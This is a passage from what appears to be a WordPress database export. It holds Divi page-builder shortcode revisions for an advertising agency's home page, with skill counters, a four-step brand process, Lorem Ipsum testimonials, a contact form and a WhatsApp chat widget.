animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 22:13:07','2020-07-18 22:13:07','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(362,1,'2020-07-28 21:24:01','2020-07-28 21:24:01','<!-- wp:elfsight-whatsapp-chat/block {\"id\":\"1\",\"exist\":true} /-->','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-28 21:24:01','2020-07-28 21:24:01','',134,'https://52.66.212.87/2020/07/28/134-revision-v1/',0,'revision','',0),(363,1,'2020-07-28 21:24:34','2020-07-28 21:24:34','[et_pb_section admin_label=\"section\"]\n			[et_pb_row admin_label=\"row\"]\n				[et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\"]<!-- wp:elfsight-whatsapp-chat/block {\"id\":\"1\",\"exist\":true} /-->[/et_pb_text][/et_pb_column]\n			[/et_pb_row]\n		[/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-28 21:24:34','2020-07-28 21:24:34','',134,'https://52.66.212.87/2020/07/28/134-revision-v1/',0,'revision','',0),(365,1,'2020-07-28 21:30:16','2020-07-28 21:30:16','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" 